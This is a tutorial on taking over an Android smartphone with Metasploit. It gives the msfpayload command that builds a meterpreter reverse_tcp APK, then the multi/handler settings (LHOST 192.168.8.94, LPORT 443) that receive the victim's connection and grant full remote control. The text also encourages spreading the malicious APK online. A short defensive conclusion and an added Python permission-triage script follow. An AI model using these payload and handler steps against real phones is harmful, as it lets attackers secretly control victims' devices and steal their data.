Hacking Android Smartphone using Metasploit

The number of mobile users grows every day, and the security threat grows along with it. Today's tutorial shows how an Android smartphone can be compromised using Metasploit. Why did we choose an Android phone for this tutorial? Simply because Android phones have been growing very fast worldwide lately. Here in China you can get an Android phone for only US$ 30, which is one of the reasons Android is growing so fast.
What is Android? According to Wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
And what is an APK? According to Wikipedia:
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use an HTC One running Android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open a terminal (CTRL + ALT + T); see the tutorial on how to create a Linux keyboard shortcut.
2. We will use the Metasploit payload framework to create the exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=
As described above, the attacker IP address is 192.168.8.94; below is our screenshot of the command being executed.
3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the attacker's machine, the attacker needs to set up a handler for incoming connections on the port specified above. Type msfconsole to open the Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same as in step 2
4. Next, we need to configure the options for the Metasploit payload we specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen on for the reverse connection
exploit –> start listening for incoming connections
5. The attacker already has the APK file and now starts distributing it (I don't need to describe how to distribute this file; the internet is a good place for distribution).


6. Long story short, the victim (myself) downloads the malicious APK file and installs it. After the victim opens the application, the attacker's Metasploit console shows something like this:
7. This means that the attacker is already inside the victim's Android smartphone and can do everything with the victim's phone.
Conclusion:
1. Don't install APKs from unknown sources.
2. If you really want to install APKs from an unknown source, make sure you can view, read and examine the source code. The picture below is the source code of the malicious APK in this tutorial.
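
One way to act on the second point when no source code is at hand, as an added example that is not part of the original post: the script reads the compiled AndroidManifest.xml out of the APK (a ZIP archive) and lists the permissions it requests, so an unfamiliar app can be checked before installing. The HIGH_RISK shortlist, the review threshold and the sample APK built inline are assumptions constructed for this illustration.

```python
import io
import re
import zipfile

# Constructed shortlist for this example (not an official or complete list):
# permissions that expose private data or sensors to the app.
HIGH_RISK = {"READ_SMS", "SEND_SMS", "READ_CONTACTS", "READ_CALL_LOG",
             "RECORD_AUDIO", "CAMERA", "ACCESS_FINE_LOCATION", "CALL_PHONE"}
REVIEW_THRESHOLD = 3  # assumption: this many high-risk permissions warrants review
PERM_RE = re.compile(r"android\.permission\.([A-Z_]+)")


def manifest_permissions(apk_bytes):
    """Return sorted permission names found in the APK's AndroidManifest.xml."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        raw = apk.read("AndroidManifest.xml")
    # The compiled manifest keeps its strings as UTF-16LE or UTF-8. Searching
    # each decoding avoids a full binary-XML parser; raw[1:] covers odd offsets.
    found = set()
    for blob, enc in ((raw, "utf-16-le"), (raw[1:], "utf-16-le"), (raw, "utf-8")):
        found.update(PERM_RE.findall(blob.decode(enc, errors="ignore")))
    return sorted(found)


def triage(apk_bytes):
    """Summarise requested permissions and flag the APK for manual review."""
    perms = manifest_permissions(apk_bytes)
    risky = [p for p in perms if p in HIGH_RISK]
    return {"permissions": perms, "high_risk": risky,
            "review": len(risky) >= REVIEW_THRESHOLD}


def build_sample_apk(perms):
    """Constructed stand-in for an APK: a ZIP whose manifest holds UTF-16LE strings."""
    strings = b"".join(("android.permission." + p).encode("utf-16-le") + b"\x00\x00"
                       for p in perms)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + strings)
        z.writestr("classes.dex", b"dex\n035\x00")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_apk(["INTERNET", "READ_SMS", "RECORD_AUDIO", "CAMERA"])
    print(triage(sample))
```

A long list of sensitive permissions on an app that has no visible need for them is a reason to stop and inspect the package further before installing it.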
